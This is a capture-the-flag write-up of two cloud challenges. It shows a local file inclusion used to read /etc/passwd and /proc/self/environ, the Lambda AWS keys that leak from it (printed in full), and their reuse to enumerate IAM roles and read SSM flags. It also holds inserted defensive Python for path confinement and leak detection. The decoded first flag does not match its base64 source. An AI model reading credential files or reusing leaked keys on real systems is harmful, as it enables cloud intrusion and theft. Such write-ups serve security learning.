
# Sharing is Caring + Sequel

## Description

Using Code Sharing Platform, you found the access to the AWS temporary credentials. Now you need to get into the cloud infrastructure and start with the enumeration part, and during this process you will find the flag.

## Solution

From the description, I assumed the code sharing platform is referring to the [Tony Tony Tony](/ctf-writeup/2023/bsidessf-cloud-village-ctf/tony-tony-tony.md) challenge from before.

```javascript
var codeEditor = CodeMirror.fromTextArea(document.getElementById("code"), {
    lineNumbers: true,
    mode: "javascript",
    theme: "default"
});

var myHeaders = new Headers();
myHeaders.append("authorizationToken", "flag-{gtkO4f4NOrJsRRNZWxiTbL6LLUs5Ir8g}");
myHeaders.append("Content-Type", "application/json");

var raw = JSON.stringify({
    "codeFile": code
});

var requestOptions = {
    method: 'POST',
    headers: myHeaders,
    body: raw,
    redirect: 'follow'
};

fetch("https://jg0rh6th8e.execute-api.ap-south-1.amazonaws.com/test/share", requestOptions)
    .then(response => response.text())
    .then(result => {
        var resultDiv = document.getElementById("result");
        resultDiv.innerHTML = "";

        var pre = document.createElement("pre");
        pre.innerText = result;
        resultDiv.appendChild(pre);
    })
    .catch(error => console.log('error', error));
```

However, the code from the Tony Tony Tony code sharing platform is incomplete and I can't send any request with it. Using Postman, I followed the instructions from the code to send a POST request.

<figure><img src="/files/rijUqSNAMrDg1XV4TgQ6" alt=""><figcaption></figcaption></figure>

I sent a POST request with a random value for `codeFile` and received a stack trace error.

After fuzzing around with the `codeFile` variable for a bit, my teammate identified a local file inclusion vulnerability where we can retrieve `/etc/passwd` as a proof of concept.

<figure><img src="/files/QeVzxnxpsB2wQ9siAnOw" alt=""><figcaption></figcaption></figure>
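The handler's source is not shown in this writeup, so the following is an added example, not the challenge's code: a hypothetical `read_shared_file` helper that confines a request-supplied `codeFile` path to an assumed base directory, which is the check whose absence lets `/etc/passwd` and `/proc/self/environ` be read. The directory layout, file names and function names are assumptions.

```python
import os
import tempfile


class PathRejected(Exception):
    """Raised when a requested path resolves outside the shared-code directory."""


def resolve_inside(base_dir: str, requested: str) -> str:
    """Return the real path of `requested` if it stays under `base_dir`."""
    base = os.path.realpath(base_dir)
    # Join first, then resolve symlinks and '..' segments. os.path.join discards
    # `base` when `requested` is absolute, so the containment check below is
    # what stops "/etc/passwd" as well as "../../etc/passwd".
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise PathRejected(requested)
    return candidate


def read_shared_file(base_dir: str, requested: str) -> bytes:
    """Hardened counterpart of a handler that opens `codeFile` directly."""
    path = resolve_inside(base_dir, requested)
    if not os.path.isfile(path):
        raise PathRejected(requested)
    with open(path, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Run the check against constructed inputs and report which were blocked."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "shared")
        os.mkdir(base)
        with open(os.path.join(base, "snippet.js"), "w") as fh:
            fh.write("console.log('hi')\n")
        # A symlink planted inside the directory must not escape it either.
        os.symlink("/etc", os.path.join(base, "link"))
        for name in ["snippet.js", "/etc/passwd", "/proc/self/environ",
                     "../../../etc/passwd", "link/passwd"]:
            try:
                read_shared_file(base, name)
                results[name] = "served"
            except PathRejected:
                results[name] = "blocked"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{outcome:8} {name}")
```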

Viewing the `/proc/self/environ` file, we are able to retrieve a set of AWS credentials.

<figure><img src="/files/FymrjDXzLdkxOVk1Y0fQ" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```json
{
    "statusCode": 200,
    "body": "b'LANG=en_US.UTF-8\\x00_AWS_XRAY_DAEMON_ADDRESS=169.254.79.129\\x00AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/ShareCodeFile\\x00AWS_LAMBDA_LOG_STREAM_NAME=2023/04/24/[$LATEST]0a87da37d7f54fd6be10cc5285ce2a29\\x00TZ=:UTC\\x00AWS_DEFAULT_REGION=ap-south-1\\x00PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\\x00AWS_XRAY_CONTEXT_MISSING=LOG_ERROR\\x00AWS_SESSION_TOKEN=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\\x00AWS_EXECUTION_ENV=AWS_Lambda_rapid\\x00LAMBDA_TASK_ROOT=/var/task\\x00LAMBDA_RUNTIME_DIR=/var/runtime\\x00_HANDLER=lambda_function.lambda_handler\\x00AWS_REGION=ap-south-1\\x00_AWS_XRAY_DAEMON_PORT=2000\\x00AWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\\x00AWS_LAMBDA_FUNCTION_VERSION=$LATEST\\x00LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\\x00AWS_XRAY_DAEMON_ADDRESS=169.254.79.129:2000\\x00AWS_ACCESS_KEY_ID=ASIAYX67JAH5K2K4DN73\\x00AWS_SECRET_ACCESS_KEY=oXqei6pVOd5xMf/sw7AIeaNW6iPbHRQIEqI7Lxy2\\x00AWS_LAMBDA_FUNCTION_NAME=ShareCodeFile\\x00AWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\\x00AWS_LAMBDA_INITIALIZATION_TYPE=on-demand\\x00'"
}
```

{% endcode %}

```
AWS_SESSION_TOKEN=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
AWS_REGION=ap-south-1
AWS_ACCESS_KEY_ID=ASIAYX67JAH5K2K4DN73
AWS_SECRET_ACCESS_KEY=oXqei6pVOd5xMf/sw7AIeaNW6iPbHRQIEqI7Lxy2
```
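An added example (not part of the original writeup) of a response-side check for this kind of leak: it decodes a body in the same `b'...'` form as the response above, splits it on NUL bytes the way `/proc/<pid>/environ` is laid out, and reports which credential-bearing variables it contains without echoing their values. The sample body is constructed with fake values, and the function names are assumptions.

```python
import ast
import json
import re

# Variables whose presence in a response means the execution role's
# temporary credentials have left the function.
SENSITIVE = {"AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN"}
# Temporary (STS-issued) access key IDs start with "ASIA".
TEMP_KEY_ID = re.compile(r"^ASIA[A-Z0-9]{16}$")


def parse_environ(body: str) -> dict:
    """Decode a Python bytes repr of /proc/<pid>/environ into a dict."""
    raw = ast.literal_eval(body)          # literals only, no code execution
    if not isinstance(raw, bytes):
        raise ValueError("body is not a bytes literal")
    env = {}
    for entry in raw.split(b"\x00"):      # entries are NUL-terminated KEY=VALUE
        if b"=" not in entry:
            continue                      # empty entry after the final NUL
        key, _, value = entry.partition(b"=")
        env[key.decode()] = value.decode(errors="replace")
    return env


def leaked_credentials(response_text: str) -> dict:
    """Return {variable: redacted note} for credentials found in an API response."""
    body = json.loads(response_text).get("body", "")
    try:
        env = parse_environ(body)
    except (ValueError, SyntaxError):
        return {}                         # body is not an environ dump
    findings = {}
    for name in sorted(SENSITIVE & env.keys()):
        findings[name] = f"<redacted, {len(env[name])} chars>"
    if TEMP_KEY_ID.match(env.get("AWS_ACCESS_KEY_ID", "")):
        findings["credential_type"] = "temporary (STS)"
    return findings


# Constructed sample in the same shape as the response above; values are fake.
SAMPLE = json.dumps({
    "statusCode": 200,
    "body": repr(b"LANG=en_US.UTF-8\x00AWS_REGION=ap-south-1\x00"
                 b"AWS_ACCESS_KEY_ID=ASIAEXAMPLEEXAMPLE00\x00"
                 b"AWS_SECRET_ACCESS_KEY=constructedSecretValue\x00"
                 b"AWS_SESSION_TOKEN=constructedToken\x00"),
})

if __name__ == "__main__":
    for name, note in leaked_credentials(SAMPLE).items():
        print(f"{name}: {note}")
```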

Next, I log in using `aws configure` and manually append the session token to the `~/.aws/credentials` file.

<figure><img src="/files/T5Xr5E1sye3DQWkziaud" alt=""><figcaption></figcaption></figure>

Running `aws iam list-roles` returns a bunch of roles:

```json
{
        "Roles": [
        {
            "Path": "/service-role/",
            "RoleName": "APIAuthorizer-role-htxly2ru",
            "RoleId": "AROAYX67JAH5PXCHMU4DI",
            "Arn": "arn:aws:iam::601226805754:role/service-role/APIAuthorizer-role-htxly2ru",
            "CreateDate": "2023-04-11T05:41:15Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "lambda.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/ops.apigateway.amazonaws.com/",
            "RoleName": "AWSServiceRoleForAPIGateway",
            "RoleId": "AROAYX67JAH5DPM2D3IHV",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/ops.apigateway.amazonaws.com/AWSServiceRoleForAPIGateway",
            "CreateDate": "2023-04-11T05:04:43Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ops.apigateway.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "Description": "The Service Linked Role is used by Amazon API Gateway.",
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/dynamodb.application-autoscaling.amazonaws.com/",
            "RoleName": "AWSServiceRoleForApplicationAutoScaling_DynamoDBTable",
            "RoleId": "AROAYX67JAH5GQPRXIFNT",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/dynamodb.application-autoscaling.amazonaws.com/AWSServiceRoleForApplicationAutoScaling_DynamoDBTable",
            "CreateDate": "2023-04-08T16:55:41Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "dynamodb.application-autoscaling.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/ecs.application-autoscaling.amazonaws.com/",
            "RoleName": "AWSServiceRoleForApplicationAutoScaling_ECSService",
            "RoleId": "AROAYX67JAH5LWWXBCO26",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/ecs.application-autoscaling.amazonaws.com/AWSServiceRoleForApplicationAutoScaling_ECSService",
            "CreateDate": "2023-04-08T19:33:23Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ecs.application-autoscaling.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/ecs.amazonaws.com/",
            "RoleName": "AWSServiceRoleForECS",
            "RoleId": "AROAYX67JAH5BZGC632I4",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/ecs.amazonaws.com/AWSServiceRoleForECS",
            "CreateDate": "2023-04-08T18:44:05Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ecs.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "Description": "Role to enable Amazon ECS to manage your cluster.",
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/elasticache.amazonaws.com/",
            "RoleName": "AWSServiceRoleForElastiCache",
            "RoleId": "AROAYX67JAH5AA2RHP4S2",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/elasticache.amazonaws.com/AWSServiceRoleForElastiCache",
            "CreateDate": "2023-04-08T18:44:08Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "elasticache.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "Description": "This policy allows ElastiCache to manage AWS resources on your behalf as necessary for managing your cache.",
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/elasticloadbalancing.amazonaws.com/",
            "RoleName": "AWSServiceRoleForElasticLoadBalancing",
            "RoleId": "AROAYX67JAH5ID7BXSSCA",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/elasticloadbalancing.amazonaws.com/AWSServiceRoleForElasticLoadBalancing",
            "CreateDate": "2023-04-08T18:44:08Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "elasticloadbalancing.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "Description": "Allows ELB to call AWS services on your behalf.",
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/rds.amazonaws.com/",
            "RoleName": "AWSServiceRoleForRDS",
            "RoleId": "AROAYX67JAH5KGFGF3UWA",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS",
            "CreateDate": "2023-04-08T18:44:07Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "rds.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "Description": "Allows Amazon RDS to manage AWS resources on your behalf",
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/support.amazonaws.com/",
            "RoleName": "AWSServiceRoleForSupport",
            "RoleId": "AROAYX67JAH5OJSEOXQHS",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
            "CreateDate": "2023-03-10T15:41:26Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "support.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "Description": "Enables resource access for AWS to provide billing, administrative and support services",
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/aws-service-role/trustedadvisor.amazonaws.com/",
            "RoleName": "AWSServiceRoleForTrustedAdvisor",
            "RoleId": "AROAYX67JAH5KEKIKCCTX",
            "Arn": "arn:aws:iam::601226805754:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
            "CreateDate": "2023-03-10T15:41:26Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "trustedadvisor.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "Description": "Access for the AWS Trusted Advisor Service to help reduce cost, increase performance, and improve security of your AWS environment.",
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/",
            "RoleName": "ctfd-ecs-task-execution",
            "RoleId": "AROAYX67JAH5JV676JWAN",
            "Arn": "arn:aws:iam::601226805754:role/ctfd-ecs-task-execution",
            "CreateDate": "2023-04-08T18:44:04Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Sid": "ECSAssumeRole",
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ecs-tasks.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/",
            "RoleName": "ctfd-secrets-role",
            "RoleId": "AROAYX67JAH5N3L6SZDHL",
            "Arn": "arn:aws:iam::601226805754:role/ctfd-secrets-role",
            "CreateDate": "2023-04-08T18:44:04Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Sid": "ECSTasksAssumeRole",
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ecs-tasks.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/service-role/",
            "RoleName": "CustomAPILambdaAuth-role-03rd552i",
            "RoleId": "AROAYX67JAH5DDDSFZDDT",
            "Arn": "arn:aws:iam::601226805754:role/service-role/CustomAPILambdaAuth-role-03rd552i",
            "CreateDate": "2023-04-11T07:28:07Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "lambda.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/service-role/",
            "RoleName": "OptionsHandler-role-clu7piz8",
            "RoleId": "AROAYX67JAH5GUMLLS2HX",
            "Arn": "arn:aws:iam::601226805754:role/service-role/OptionsHandler-role-clu7piz8",
            "CreateDate": "2023-04-19T11:29:16Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "lambda.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/service-role/",
            "RoleName": "ShareCodeFile-role-sbutfhkq",
            "RoleId": "AROAYX67JAH5GNBPLQTIR",
            "Arn": "arn:aws:iam::601226805754:role/service-role/ShareCodeFile-role-sbutfhkq",
            "CreateDate": "2023-04-11T05:09:38Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "lambda.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        }
    ]
}
```

The role `ShareCodeFile-role-sbutfhkq` seems interesting as its name is the same as our user.

Running `aws iam list-role-policies --role-name role-name` lists the names of the inline policies embedded in the specified IAM role:

```json
{
    "PolicyNames": [
        "SSMParametersLISTREAD",
        "ZmxhZy17a0drMTlzQmN3TlJua2FyWkZLYW1vS1E0TzZzQzRpSjF9"
    ]
}
```

Decoding the base64 string returns the flag.

Flag: `flag-{GaW6NW8vzwIhh8qU643AV3ohh4gwDByw}`

## Sharing is Caring Sequel

From the policy name, I make a guess that I have permission to list and read parameters in SSM.

<https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html>

Running `aws ssm describe-parameters` shows the flag location:

<figure><img src="/files/ANgEnUfjlbQPDFUVEZ3I" alt=""><figcaption></figcaption></figure>

I am then able to use `aws ssm get-parameter --name "/envcodeshare/test/flag"` to retrieve the flag value:

<figure><img src="/files/xmbzhKrruTJPzJCNksK1" alt=""><figcaption></figcaption></figure>

Flag: `flag-{fUg3jZueA4J1u7nEVNqLFVASEZcyYjR0}`


